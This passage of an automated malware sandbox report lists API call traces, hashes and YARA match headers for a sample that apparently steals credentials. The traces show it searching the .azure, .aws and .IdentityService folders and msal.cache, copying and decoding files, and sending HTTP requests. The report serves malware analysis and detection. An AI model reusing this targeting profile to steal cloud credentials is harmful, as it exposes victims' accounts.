                                      • Instruction ID: 5f6e0c8a67a94d7a20a5bef497d75f0b8269651878ac279db78dd9da6b658621
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 17A14DBD5C0240BFE364EFE8ED98A963BFBF74E201714661AE605C3264D7399441DB12
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02309C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                        • Part of subcall function 02309C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                        • Part of subcall function 02309C27: LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                        • Part of subcall function 02309C27: ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
                                        • Part of subcall function 02309C27: LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                        • Part of subcall function 02309C27: CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                        • Part of subcall function 02319097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023190B9
                                      • strtok_s.MSVCRT ref: 02310582
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 023105C9
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023105D0
                                      • StrStrA.SHLWAPI(00000000,00421618), ref: 023105EC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023105FA
                                        • Part of subcall function 02318B47: malloc.MSVCRT ref: 02318B4F
                                        • Part of subcall function 02318B47: strncpy.MSVCRT ref: 02318B6A
                                      • StrStrA.SHLWAPI(00000000,00421620), ref: 02310636
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310644
                                      • StrStrA.SHLWAPI(00000000,00421628), ref: 02310680
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0231068E
                                      • StrStrA.SHLWAPI(00000000,00421630), ref: 023106CA
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023106DC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310769
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310781
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310799
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023107B1
                                      • lstrcat.KERNEL32(?,0042164C), ref: 023107C9
                                      • lstrcat.KERNEL32(?,00421660), ref: 023107D8
                                      • lstrcat.KERNEL32(?,00421670), ref: 023107E7
                                      • lstrcat.KERNEL32(?,00000000), ref: 023107FA
                                      • lstrcat.KERNEL32(?,00421678), ref: 02310809
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231081C
                                      • lstrcat.KERNEL32(?,0042167C), ref: 0231082B
                                      • lstrcat.KERNEL32(?,00421680), ref: 0231083A
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231084D
                                      • lstrcat.KERNEL32(?,00421688), ref: 0231085C
                                      • lstrcat.KERNEL32(?,0042168C), ref: 0231086B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231087E
                                      • lstrcat.KERNEL32(?,00421698), ref: 0231088D
                                      • lstrcat.KERNEL32(?,0042169C), ref: 0231089C
                                      • strtok_s.MSVCRT ref: 023108E0
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023108F5
                                      • memset.MSVCRT ref: 02310944
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID:
                                      • API String ID: 3689735781-0
                                      • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction ID: fde01e4f780b8883a004abb755ad02428586499f7ad44e47f7f34902ba362aeb
                                      • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction Fuzzy Hash: 78D14D75A41208ABCB18FBF0DD95EEEB77AFF14302F508519E102A6090EF74AA45CF61
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 00405A13
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00882610,00000000,?,0087C388,00000000,?,00421A1C), ref: 00405E71
                                      • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                      • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                      • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                      • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                      • memcpy.MSVCRT(?), ref: 00405EFE
                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                      • HttpOpenRequestA.WININET(00000000,00882520,?,00881E28,00000000,00000000,00400100,00000000), ref: 00405BF8
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 1406981993-2180234286
                                      • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                      • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                      • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                      • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                      APIs
                                      • memset.MSVCRT ref: 00414D87
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • memset.MSVCRT ref: 00414E13
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      • memset.MSVCRT ref: 00414E9F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00882620,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                      • memset.MSVCRT ref: 00414F2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                      • API String ID: 4017274736-156832076
                                      • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                      • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                      • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                      • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                      • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                      • lstrcatA.KERNEL32(?,00000000,008786B0,00421474,008786B0,00421470,00000000), ref: 0040D208
                                      • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                      • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                      • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                      • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                      • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                      • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                      • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • lstrlenA.KERNEL32(?), ref: 0040D32A
                                      • lstrlenA.KERNEL32(?), ref: 0040D339
                                      • memset.MSVCRT ref: 0040D388
                                        • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 2775534915-0
                                      • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                      • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                      • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                      • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230D1EA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0230D32E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0230D335
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D46F
                                      • lstrcat.KERNEL32(?,00421478), ref: 0230D47E
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D491
                                      • lstrcat.KERNEL32(?,0042147C), ref: 0230D4A0
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D4B3
                                      • lstrcat.KERNEL32(?,00421480), ref: 0230D4C2
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D4D5
                                      • lstrcat.KERNEL32(?,00421484), ref: 0230D4E4
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D4F7
                                      • lstrcat.KERNEL32(?,00421488), ref: 0230D506
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D519
                                      • lstrcat.KERNEL32(?,0042148C), ref: 0230D528
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D53B
                                      • lstrcat.KERNEL32(?,00421490), ref: 0230D54A
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                      • lstrlen.KERNEL32(?), ref: 0230D591
                                      • lstrlen.KERNEL32(?), ref: 0230D5A0
                                      • memset.MSVCRT ref: 0230D5EF
                                        • Part of subcall function 0231ACD7: StrCmpCA.SHLWAPI(0064A350,0230AA0E,?,0230AA0E,0064A350), ref: 0231ACF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230D61B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 1973479514-0
                                      • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction ID: 22391ba68a53ce4a9fc81fc7d9a98aa4d62d8a3bf9c46a5871d20f3885a526d8
                                      • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction Fuzzy Hash: A1E15975951208ABCB28FBE0DD95EEE777ABF14302F504159E106A70A0EF34AB49CF61
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02305C5F
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 02305C7A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02305DFA
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 023060D8
                                      • lstrlen.KERNEL32(00000000), ref: 023060E9
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 023060FA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02306101
                                      • lstrlen.KERNEL32(00000000), ref: 02306116
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 0230612D
                                      • lstrlen.KERNEL32(00000000), ref: 0230613F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02306158
                                      • memcpy.MSVCRT(?), ref: 02306165
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 02306182
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02306196
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 023061B3
                                      • InternetCloseHandle.WININET(00000000), ref: 02306217
                                      • InternetCloseHandle.WININET(00000000), ref: 02306224
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02305E5F
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 0230622E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                      • String ID:
                                      • API String ID: 1703137719-0
                                      • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction ID: e59b1d0b5f9988f88b9d904212ade5fd9410f2252573cdc8e62973cbb4dd83b7
                                      • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction Fuzzy Hash: 7A12D575951218ABCB29EBA0DD94FEEB77ABF14701F504199E10AA3090EF706F89CF50
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00880AA0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                      • StrStrA.SHLWAPI(?,00880AD0,00420B52), ref: 0040CAF7
                                      • StrStrA.SHLWAPI(00000000,00880B18), ref: 0040CB1E
                                      • StrStrA.SHLWAPI(?,00881140,00000000,?,00421458,00000000,?,00000000,00000000,?,00878600,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                      • StrStrA.SHLWAPI(00000000,00880FC0), ref: 0040CCB9
                                        • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                        • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008786D0), ref: 0040C871
                                        • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                        • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • StrStrA.SHLWAPI(?,00880FC0,00000000,?,0042145C,00000000,?,00000000,008786D0), ref: 0040CD5A
                                      • StrStrA.SHLWAPI(00000000,008784C0), ref: 0040CD71
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                      • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                      • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                      • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
